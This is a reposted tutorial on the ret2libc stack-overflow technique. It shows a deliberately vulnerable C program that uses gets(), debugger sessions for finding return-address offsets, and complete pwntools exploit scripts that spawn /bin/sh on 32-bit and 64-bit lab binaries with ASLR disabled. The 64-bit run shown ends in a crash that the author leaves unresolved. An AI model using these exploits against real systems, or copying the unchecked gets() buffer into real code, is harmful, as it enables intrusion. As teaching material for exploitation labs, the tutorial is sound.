ret2libc
When a program is built with NX protection, traditional shellcode placed on the stack is not executable, so it cannot be used to get a shell. In that case the ret2libc technique can be used instead: the return address is redirected to code that already exists in libc.
Vulnerable program
#include <stdio.h>

void vuln() {
    char buffer[64];
    puts("Overflow me");
    gets(buffer);   /* no bounds check: input longer than 64 bytes overwrites saved ebp/eip */
}

int main() {
    vuln();
}
gcc -m32 -fno-stack-protector -no-pie vuln.c -o vuln-32
└─$ checksec --file=./vuln-32
[*] '/home/kali/exploits/ret2libc/vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
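The checksec output above is derived from the ELF headers: NX comes from the PT_GNU_STACK program header, PIE from the file type, and (partial) RELRO from the presence of PT_GNU_RELRO. The following is an added example, not code from the original post or from checksec, that performs those three checks directly with the standard library so a build can be verified without extra tooling; build_synthetic_elf is a constructed, non-loadable header-only image used purely as test input.

```python
import struct
import sys

# ELF constants (ELF specification / elf.h)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4


def elf_mitigations(data: bytes) -> dict:
    """Report NX / PIE / RELRO the way checksec derives them from the headers.

    NX:    PT_GNU_STACK present without PF_X. A missing PT_GNU_STACK is reported
           as NX disabled (the historical kernel default is an executable stack).
    PIE:   e_type == ET_DYN.
    RELRO: PT_GNU_RELRO present (partial RELRO; full RELRO additionally needs
           BIND_NOW in the dynamic section, which this header-only check skips).
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    bits = 32 if data[4] == 1 else 64
    end = "<" if data[5] == 1 else ">"
    e_type = struct.unpack_from(end + "H", data, 16)[0]
    if bits == 32:
        e_phoff = struct.unpack_from(end + "I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
        phdr_fmt, flags_idx = end + "IIIIIIII", 6   # Elf32_Phdr: p_flags is the 7th field
    else:
        e_phoff = struct.unpack_from(end + "Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
        phdr_fmt, flags_idx = end + "IIQQQQQQ", 1   # Elf64_Phdr: p_flags is the 2nd field
    nx, relro = False, False
    for i in range(e_phnum):
        fields = struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)
        if fields[0] == PT_GNU_STACK:
            nx = not (fields[flags_idx] & PF_X)
        elif fields[0] == PT_GNU_RELRO:
            relro = True
    return {"bits": bits, "nx": nx, "pie": e_type == ET_DYN, "relro": relro}


def build_synthetic_elf(bits: int, exec_stack: bool, pie: bool) -> bytes:
    """Constructed test input: a header-only ELF image (not loadable) carrying
    just a PT_GNU_STACK and a PT_GNU_RELRO program header."""
    ident = b"\x7fELF" + bytes([1 if bits == 32 else 2, 1, 1]) + b"\x00" * 9
    e_type = ET_DYN if pie else ET_EXEC
    stack_flags = PF_R | PF_W | (PF_X if exec_stack else 0)
    if bits == 32:
        ehdr = ident + struct.pack("<HHIIIIIHHHHHH",
                                   e_type, 3, 1, 0, 52, 0, 0, 52, 32, 2, 0, 0, 0)
        phdrs = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
        phdrs += struct.pack("<IIIIIIII", PT_GNU_RELRO, 0, 0, 0, 0, 0, PF_R, 1)
    else:
        ehdr = ident + struct.pack("<HHIQQQIHHHHHH",
                                   e_type, 62, 1, 0, 64, 0, 0, 64, 56, 2, 0, 0, 0)
        phdrs = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
        phdrs += struct.pack("<IIQQQQQQ", PT_GNU_RELRO, PF_R, 0, 0, 0, 0, 0, 1)
    return ehdr + phdrs


if __name__ == "__main__":
    # Usage: python elfcheck.py ./vuln-32 ./vuln-64   (any ELF files on disk)
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, elf_mitigations(f.read()))
```

Run against vuln-32 as built above it reports nx=True, pie=False, relro=True, matching the checksec lines; the stack canary is not visible in the headers (checksec finds it by looking for the __stack_chk_fail symbol), so it is intentionally left out of this check.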
Exploit approach
Point eip directly at system('/bin/sh').
Determining the eip offset
[0xf7fe4450]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
[+] SIGNAL 11 errno=0 addr=0x41614141 code=1 si_pid=1096892737 ret=0
[0x41614141]> wopO 0x41614141
76
eip_offset == 76
Getting the address of system
(Note that ASLR is disabled here.)
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ldd vuln-32
linux-gate.so.1 (0xf7fc7000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7c00000)
/lib/ld-linux.so.2 (0xf7fc9000)
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ readelf -s /lib/i386-linux-gnu/libc.so.6| grep system
3172: 0004c800 55 FUNC WEAK DEFAULT 15 system@@GLIBC_2.0
system_addr == 0xf7c00000 + 0x4c800
Getting the address of /bin/sh
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ strings -tx /lib/i386-linux-gnu/libc.so.6|grep "/bin/sh"
1b5faa /bin/sh
binsh_addr == 0xf7c00000 + 0x1b5faa
Exploit script (pwntools)
from pwn import *

context.binary = ELF('./vuln-32')
p = process()

libc_base = 0xf7c00000              # libc load address from ldd (ASLR disabled)
system_addr = libc_base + 0x4c800   # offset of system@@GLIBC_2.0 from readelf above
binsh_addr = libc_base + 0x1b5faa   # offset of the "/bin/sh" string from strings above
RET_OFFSET = 76                     # distance from the start of buffer to the saved eip

payload = b'A' * RET_OFFSET
payload += p32(system_addr)   # overwrites the saved eip: ret pops it into eip
payload += p32(0)             # [esp] == system's return address; not important here
payload += p32(binsh_addr)    # [esp + 4] == system's first parameter
p.clean()
p.sendline(payload)
p.interactive()
64-bit exploit approach
In x64 mode, arguments are passed in the registers rdi, rsi, rdx, rcx, r8 and r9, so to execute system('/bin/sh') a {pop rdi ; ret} gadget is needed to load the first argument into rdi before returning into system.
Getting the libc base address
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ldd vuln-64
linux-vdso.so.1 (0x00007ffff7fc9000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7dce000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fcb000)
Getting the offset of system
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ readelf -s /lib/x86_64-linux-gnu/libc.so.6| grep system
1023: 000000000004c330 45 FUNC WEAK DEFAULT 16 system@@GLIBC_2.2.5
Getting the offset of /bin/sh
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 |grep /bin/sh
196031 /bin/sh
Finding a ROP gadget
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ROPgadget --binary vuln-64 |grep rdi
0x0000000000401042 : fisubr dword ptr [rdi] ; add byte ptr [rax], al ; push 1 ; jmp 0x401020
0x00000000004010a6 : or dword ptr [rdi + 0x404038], edi ; jmp rax
0x00000000004011cb : pop rdi ; ret
Locating the rip offset
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0
[0x00401159]> dr
rsi = 0x00000001
rdi = 0x7ffff7fa1a20
rsp = 0x7fffffffe308
rbp = 0x4141584141574141
rip = 0x00401159
rflags = 0x00010202
orax = 0xffffffffffffffff
[0x00401159]> wopO `dr rbp`
64
rip_offset = rbp_offset + 8 = 72
Note that rip itself is not overwritten in this crash: on x86-64 a ret to a non-canonical address such as 0x4141414141414141 faults at the ret instruction, so rip still points at it (0x00401159) and the pattern has to be read from the saved rbp instead. The saved rbp sits 8 bytes below the return address, hence the + 8.
64-bit exploit script
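Both offset determinations above (eip == 0x41614141 in the 32-bit run, rbp == 0x4141584141574141 in the 64-bit run) rely on the same idea: the input is a de Bruijn sequence in which every 3-character window is unique, so the register value read from the crash identifies exactly where in the input it came from. The following is an added example, not code from the original post or from radare2, that generates that pattern in the same alphabet order as the radare2 sessions and recovers the offset from a crash value; it is what wopD/wopO (or pwntools cyclic/cyclic_find) do, written out so the mechanism is visible.

```python
import itertools

# Alphabet in the order visible in the radare2 pattern above: A-Z, a-z, then 1-9, 0.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890"


def de_bruijn(alphabet: str = ALPHABET, n: int = 3):
    """Lazily yield the de Bruijn sequence B(k, n) (FKM algorithm).

    Every length-n window occurs exactly once, so any n consecutive bytes of
    the pattern identify their own position.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic_pattern(length: int) -> bytes:
    """First `length` bytes of the pattern, i.e. what is fed to the program's stdin."""
    return "".join(itertools.islice(de_bruijn(), length)).encode()


def find_offset(crash_value: int, width: int, length: int = 4096) -> int:
    """Offset of a crashed register's value inside the pattern, or -1 if absent.

    width is the register size in bytes: 4 for eip on i386, 8 for rbp/rip on
    x86-64. The value is matched as the little-endian bytes that were loaded
    from the stack. Raises OverflowError if the value does not fit in width.
    """
    needle = crash_value.to_bytes(width, "little")
    return cyclic_pattern(length).find(needle)


if __name__ == "__main__":
    print(cyclic_pattern(200).decode())
    print("eip offset (32-bit crash):", find_offset(0x41614141, 4))          # 76
    rbp_offset = find_offset(0x4141584141574141, 8)                          # 64
    print("rip offset (64-bit crash):", rbp_offset + 8)                      # 72
```

The two constants in the main block are the crash values taken from the radare2 sessions above; the 64-bit lookup has to go through rbp because, as noted, rip is not overwritten when the return address is non-canonical.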
from pwn import *

context.binary = ELF('./vuln-64')
p = process()

libc = 0x00007ffff7dce000   # libc load address from ldd (ASLR disabled)
system_offset = 0x4c330     # offset of system@@GLIBC_2.2.5 from readelf
binsh_offset = 0x196031     # offset of the "/bin/sh" string from strings
system = libc + system_offset
binsh = libc + binsh_offset
pop_rdi_ret = 0x4011cb      # pop rdi ; ret gadget found by ROPgadget

payload = b'A' * 72         # reach the saved return address (rbp_offset + 8)
payload += p64(pop_rdi_ret)
payload += p64(binsh)       # popped into rdi: system's first argument
payload += p64(system)
payload += p64(0x0)         # return address after system; not important here
p.clean()
p.sendline(payload)
p.interactive()
The result has a bug???
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ python expvuln64.py
[*] '/home/kali/exploits/ret2libc/vuln-64'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process './vuln-64': pid 1953037
[*] '/usr/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ ls
[*] Process './vuln-64' stopped with exit code -11 (SIGSEGV) (pid 1953037)
[*] Got EOF while sending in interactive
- Original author: winsun
- Original link: https://winsun.github.io/fightsec/post/pwn_04_ret2libc/
- License: This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. Non-commercial reposts must credit the source (author and original link); for commercial use, contact the author for permission.